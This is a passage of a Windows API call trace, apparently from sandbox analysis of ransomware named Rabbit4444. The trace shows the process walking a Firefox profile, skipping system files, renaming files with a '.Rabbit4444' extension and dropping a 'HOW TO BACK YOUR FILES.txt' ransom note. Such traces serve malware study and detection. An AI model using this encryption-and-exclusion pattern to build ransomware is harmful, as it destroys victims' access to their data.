(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\webappsstore.sqlite.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\webappsstore.sqlite.rabbit4444"), dwFlags=0x1) returned 1 [0051.883] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8154a58, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xulstore.json", cAlternateFileName="XULSTO~1.JSO")) returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="Rabbit4444.exe") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2=".") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="..") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="windows") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="bootmgr") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="pagefile.sys") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="boot") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="ids.txt") returned 1 [0051.883] lstrcmpiW (lpString1="xulstore.json", lpString2="NTUSER.DAT") returned 1 [0051.883] lstrcpyW (in: lpString1=0x130ebcc, lpString2="xulstore.json" | out: lpString1="xulstore.json") returned="xulstore.json" [0051.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json", dwFileAttributes=0x0) returned 1 [0051.884] lstrlenW (lpString="xulstore.json") returned 13 [0051.884] lstrlenW (lpString="Rabbit4444") returned 10 [0051.884] lstrcmpiW (lpString1="store.json", lpString2="Rabbit4444") returned 1 [0051.884] lstrlenW (lpString=".dll") returned 4 [0051.884] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.884] lstrlenW (lpString=".lnk") returned 4 [0051.884] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.884] lstrlenW (lpString=".ini") returned 4 [0051.884] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.884] lstrlenW (lpString=".sys") returned 4 [0051.884] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.884] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.884] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14319495169) returned 1 [0051.884] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=351) returned 1 [0051.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0051.884] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0051.884] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x298 [0051.888] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x70000 [0051.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.890] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.890] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14320089383) returned 1 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0051.890] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0051.890] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.890] CloseHandle (hObject=0x298) returned 1 [0051.890] CloseHandle (hObject=0x278) returned 1 [0051.890] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json.Rabbit4444") returned 98 [0051.890] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\xulstore.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\xulstore.json.rabbit4444"), dwFlags=0x1) returned 1 [0051.891] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8154a58, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xulstore.json", cAlternateFileName="XULSTO~1.JSO")) returned 0 [0051.891] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0051.891] lstrcpyW (in: lpString1=0x130ebcc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.891] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.892] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.892] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.892] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.893] CloseHandle (hObject=0x278) returned 1 [0051.893] CloseHandle (hObject=0x27c) returned 1 [0051.893] GetCurrentThreadId () returned 0xd98 [0051.893] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0051.893] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" [0051.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119208 | out: hHeap=0xe0000) returned 1 [0051.893] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0051.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage" [0051.893] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\" [0051.893] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3" [0051.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.894] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.896] FlushFileBuffers (hFile=0x27c) returned 1 [0051.897] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.897] CloseHandle (hObject=0x27c) returned 1 [0051.897] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage") returned 81 [0051.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.898] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe841b076, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102810 [0051.898] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.898] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.898] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.898] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.898] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c1abf, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe841b076, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.898] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.898] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.898] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.898] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.898] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.898] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe841b076, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe841b076, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe841b076, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.898] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.898] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.898] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de8bd2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permanent", cAlternateFileName="PERMAN~1")) returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="Rabbit4444.exe") returned -1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2=".") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="..") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="windows") returned -1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="bootmgr") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="pagefile.sys") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="boot") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="ids.txt") returned 1 [0051.898] lstrcmpiW (lpString1="permanent", lpString2="NTUSER.DAT") returned 1 [0051.898] lstrcpyW (in: lpString1=0x130ebdc, lpString2="permanent" | out: lpString1="permanent") returned="permanent" [0051.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0051.899] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x10c928 [0051.899] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0051.899] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x23c2e4c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41de8bd2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="permanent", cAlternateFileName="PERMAN~1")) returned 0 [0051.899] FindClose (in: hFindFile=0x102810 | out: hFindFile=0x102810) returned 1 [0051.899] lstrcpyW (in: lpString1=0x130ebdc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.899] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0051.900] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0051.900] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0051.901] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.901] CloseHandle (hObject=0x278) returned 1 [0051.901] CloseHandle (hObject=0x27c) returned 1 [0051.901] GetCurrentThreadId () returned 0xd98 [0051.901] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0051.901] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" [0051.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.901] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0051.901] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent" [0051.901] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\" [0051.901] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3" [0051.901] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\storage\\permanent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0051.903] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0051.905] FlushFileBuffers (hFile=0x27c) returned 1 [0051.908] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.908] CloseHandle (hObject=0x27c) returned 1 [0051.908] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent") returned 91 [0051.908] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.908] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\storage\\permanent\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de8bd2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe841b076, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0051.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.909] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.909] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0051.909] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.909] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41de8bd2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe841b076, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.909] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.909] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.909] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0051.909] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.909] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.909] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe841b076, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe841b076, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe844128a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.909] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.909] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c2e4c, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x246c9b2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x246c9b2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chrome", cAlternateFileName="")) returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="Rabbit4444.exe") returned -1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2=".") returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="..") returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="windows") returned -1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="bootmgr") returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="pagefile.sys") returned -1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="boot") returned 1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="ids.txt") returned -1 [0051.909] lstrcmpiW (lpString1="chrome", lpString2="NTUSER.DAT") returned -1 [0051.909] lstrcpyW (in: lpString1=0x130ebf0, lpString2="chrome" | out: lpString1="chrome") returned="chrome" [0051.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0051.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc6) returned 0x116a00 [0051.909] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6930 [0051.909] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41de8bd2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x41ea4c3c, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x41ea601c, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0051.910] lstrcmpiW (lpString1="moz-safe-about+home", 